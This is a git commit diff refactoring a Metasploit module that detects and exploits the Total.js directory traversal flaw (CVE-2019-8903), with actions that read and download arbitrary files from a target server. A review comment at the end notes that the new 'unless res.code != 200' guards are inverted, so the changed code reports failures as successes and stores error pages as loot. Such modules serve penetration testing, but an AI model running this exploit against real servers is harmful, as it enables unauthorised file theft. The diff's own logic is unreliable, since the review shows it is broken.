Refactory and fix

master
Fabio Cogno 2019-03-10 19:33:08 +01:00
parent 0a5964d2a4
commit 14e0643962
1 changed files with 26 additions and 25 deletions


@ -1,10 +1,8 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
require 'msf/core'
# Check and exploit Total.js Directory Traversal (CVE-2019-8903) # Check and exploit Total.js Directory Traversal (CVE-2019-8903)
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
@ -68,7 +66,7 @@ class MetasploitModule < Msf::Auxiliary
print_status("App version: #{json['version']}") print_status("App version: #{json['version']}")
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
end end
elsif res && res.headers['X-Powered-By'] =~ [Ttoaljs] elsif res && res.headers['X-Powered-By'].to_s.downcase.include?('total.js')
print_status('Target appear to be vulnerable!') print_status('Target appear to be vulnerable!')
print_status("X-Powered-By: #{res.headers['X-Powered-By']}") print_status("X-Powered-By: #{res.headers['X-Powered-By']}")
return Exploit::CheckCode::Detected return Exploit::CheckCode::Detected
@ -86,16 +84,18 @@ class MetasploitModule < Msf::Auxiliary
'method' => 'GET', 'method' => 'GET',
'uri' => uri 'uri' => uri
) )
if res && res.code == 200 unless res
print_status("Getting #{datastore['FILE']}...") print_error 'Generic error'
print_line(res.body) return
elsif res && res.code != 200 end
print_error("Unable to read '#{datastore['FILE']}', possibily because:") unless res.code != 200
print_error("Unable to read '#{datastore['FILE']}', possibly because:")
print_error("\t1. File does not exist.") print_error("\t1. File does not exist.")
print_error("\t2. No permission.") print_error("\t2. No permission.")
else return
print_error("[#{target_host}] - Generic error")
end end
print_status("Getting #{datastore['FILE']}...")
print_line(res.body)
end end
def download def download
@ -106,28 +106,29 @@ class MetasploitModule < Msf::Auxiliary
'method' => 'GET', 'method' => 'GET',
'uri' => uri 'uri' => uri
) )
if res && res.code == 200 unless res
fname = datastore['FILE'].split('/')[-1].chop print_error 'Generic error'
ctype = res.headers['Content-Type'].split(';') return
loot = store_loot('lfi.data', ctype[0], rhost, res.body, fname) end
print_good("File #{fname} downloaded to: #{loot}") unless res.code != 200
elsif res && res.code != 200 print_error("Unable to read '#{datastore['FILE']}', possibly because:")
print_error("Unable to read '#{datastore['FILE']}', possibily because:")
print_error("\t1. File does not exist.") print_error("\t1. File does not exist.")
print_error("\t2. No permission.") print_error("\t2. No permission.")
else return
print_error("[#{target_host}] - Generic error")
end end
fname = datastore['FILE'].split('/')[-1].chop
ctype = res.headers['Content-Type'].split(';')
loot = store_loot('lfi.data', ctype[0], rhost, res.body, fname)
print_good("File #{fname} downloaded to: #{loot}")
end end
def run def run
if action.name == 'CHECK' case action.name
when 'CHECK'
check check
when 'READ'
elsif action.name == 'READ'
read read
when 'DOWNLOAD'
elsif action.name == 'DOWNLOAD'
download download
end end
end end
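Review bot: The new guard `unless res.code != 200` in `read` is inverted: it takes the "Unable to read" branch and returns when the response is 200, and lets every non-200 response fall through to `print_line(res.body)`. The same line appears in `download`, where a non-200 body is then passed to `store_loot` and reported as a downloaded file, so stored results can no longer be trusted as evidence of what the target returned. Both guards should read `unless res.code == 200` (or `if res.code != 200`). In `download`, `res.headers['Content-Type'].split(';')` also raises when the header is absent; `res.headers['Content-Type'].to_s.split(';')` would match the `.to_s` handling this commit adds in `check`.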